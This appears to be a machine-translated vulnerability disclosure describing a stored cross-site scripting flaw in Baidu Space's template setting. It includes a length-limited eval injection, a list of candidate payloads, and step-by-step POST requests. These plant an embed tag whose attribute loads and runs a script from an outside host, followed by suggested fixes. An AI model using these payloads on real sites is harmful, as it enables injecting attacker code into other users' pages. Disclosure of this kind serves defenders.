The new version of Baidu space does not filter the XSS, but can be used, the length is limited to 20 length, remove the constructor at both ends, only 16 length. It is still the old method. The eval (X) and eval (name) methods are indirectly used, so we will not consider them first, we still give priority to finding a location where ID = "X" can be injected, and then...
1. The vulnerability appears in the selection of the new Baidu space template.
2. defect address: http://hi.baidu.com/set/submit/theme
3. defect parameter: template
4. Cause of defect: no input/output filtering is performed except for 20 characters.
5. After the custom content is injected, theme will appear in the following code on the space homepage and various article pages.
Window. CurrentApplyedTpl = '{template content }';
6. Based on this, we can construct the malicious code as follows:
Window. CurrentApplyedTpl = ''; eval (XXX) // '; // XXX indicates a variable that can be controlled.
7. XXX optional objects
'; Eval (qUserInfo. spaceName) // <-- 29 length, not available
'; Eval (M. innerHTML) // <-- 21 characters in length.
'; Eval (M. title) // <-- 17 Length
'; Eval (M. name) // <-- 16 Length
'; Eval (M. alt) // <-- 15 Length
'; Eval (M. src) // <-- 15 characters in length
8. Based on the above considerations, we have to find a location where we can write id = "M" attribute name = "eval code ".
However, after testing, the label in the article published by Baidu space cannot write the id attribute.
9. Fortunately, the <embed> </embed> label can be used directly by random tests (is it a legacy space ?) Www.2cto.com
Fortunately, <embed> </embed> can also write the title attribute. (Other alt and name cannot be written. src must start with http)
10. Therefore, we can construct the following exploitation steps.
Procedure:
A. POST http://hi.baidu.com/set/submit/theme
POSTDATA
Template = '; eval (M. title) // & bdstoken = {my token} & qing_request_source =
B. publish an article at will. Modify the content of POST to the following:
POST http://hi.baidu.com/pub/submit/modifytext
POSTDATA (parameters other than content are omitted)
Content = encodeURIComponent (<div> <p> <embed src = "http://www.toolmao.com" id = "M" title = "(function () {var s = document. createElement ('script'); s. src = 'HTTP: // xsst.sinaapp.com/m.js'?document.body.appendchild (s)}) () "</p> </div>)
C. This article becomes a Cross-Site Page.
Vulnerability proof
Test Platform: Win7 + Chrome, IE
Effects in Chrome
Effect of IE
Solution:
1. http://hi.baidu.com/set/submit/theme filter template content
2. The new version of the http://hi.baidu.com/pub/submit/modifytext space is still using the embed label? Even if it is used, the id can be filtered out like the img.
Author gainover